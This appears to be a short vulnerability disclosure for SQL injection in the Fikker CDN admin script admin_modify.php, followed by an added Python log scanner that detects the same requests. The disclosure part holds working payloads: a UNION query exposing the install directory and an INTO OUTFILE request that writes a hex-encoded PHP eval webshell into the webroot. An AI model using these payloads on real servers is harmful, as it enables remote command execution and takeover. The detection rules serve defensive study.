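Fikker is a professional-grade website cache (Webcache) and reverse proxy server software aimed at CDN operators and webmasters. In a recent security incident, several PHP files in the Fikker master controller were found to contain high-risk injection vulnerabilities that can be used to obtain a webshell.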
#Disclose the installation directory
admin_modify.php?id=-1%20union%20select%201,
@@basedir,3,4,5,6,7,8,9,10,11,12,13
#Write a one-line webshell
admin_modify.php?id=1%20and%201=2%20union%20
select%200x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E,
0x3c3f2f2a,3,4,5,6,7,0x2a2f3f3e,9,10,11,12,13%20into%20outfile%20%27d:/FikkerCDN/webroot/fikcdn/admin/test.php%27
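
A defensive check for the two request shapes above, as an added example that is not part of the original page or of Fikker: a Python scanner that flags access-log requests to admin_modify.php whose id parameter carries these injection markers. The log lines, IP addresses, URL prefix, output path and the hex literal are constructed sample values, and the rule names are hypothetical.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Indicators derived from the two request shapes shown on this page.
RULES = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "into_outfile": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "sys_variable": re.compile(r"@@\w+"),
    "long_hex_literal": re.compile(r"\b0x[0-9a-f]{16,}", re.I),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
ID_PARAM = re.compile(r"(?:^|&)id=([^&]*)")
TARGET = "admin_modify.php"  # the only script the page names

HEX = "0x" + "41" * 20  # constructed stand-in for a hex-encoded file body
PREFIX = '192.0.2.66 - - [01/Jan/2024:10:00:05 +0000] "GET /fikcdn/admin/'
# Constructed access-log lines: one benign request, then the two shapes above.
SAMPLE_LOG = [
    PREFIX + 'admin_modify.php?id=12 HTTP/1.1" 200 512',
    PREFIX + 'admin_modify.php?id=-1%20union%20select%201,@@basedir,3 HTTP/1.1" 200 498',
    PREFIX + 'admin_modify.php?id=1%20and%201=2%20union%20select%20' + HEX
    + ',2,3%20into%20outfile%20%27d:/example/test.php%27 HTTP/1.1" 200 0',
]

def normalise(value: str) -> str:
    """URL-decode up to three times so double-encoded input is still seen."""
    for _ in range(3):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", " ", value)

def scan_line(line: str) -> list[str]:
    """Return the names of the rules that fire for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith(TARGET):
        return []
    query = normalise(url.query)
    hits = [name for name, rx in RULES.items() if rx.search(query)]
    # A record id should be a plain integer; anything else is worth a look.
    idm = ID_PARAM.search(query)
    if idm and not re.fullmatch(r"\d+", idm.group(1).strip()):
        hits.append("non_numeric_id")
    return hits
```

The non_numeric_id rule mirrors the server-side fix: if the script accepted id only as an integer, neither request shape would reach the database.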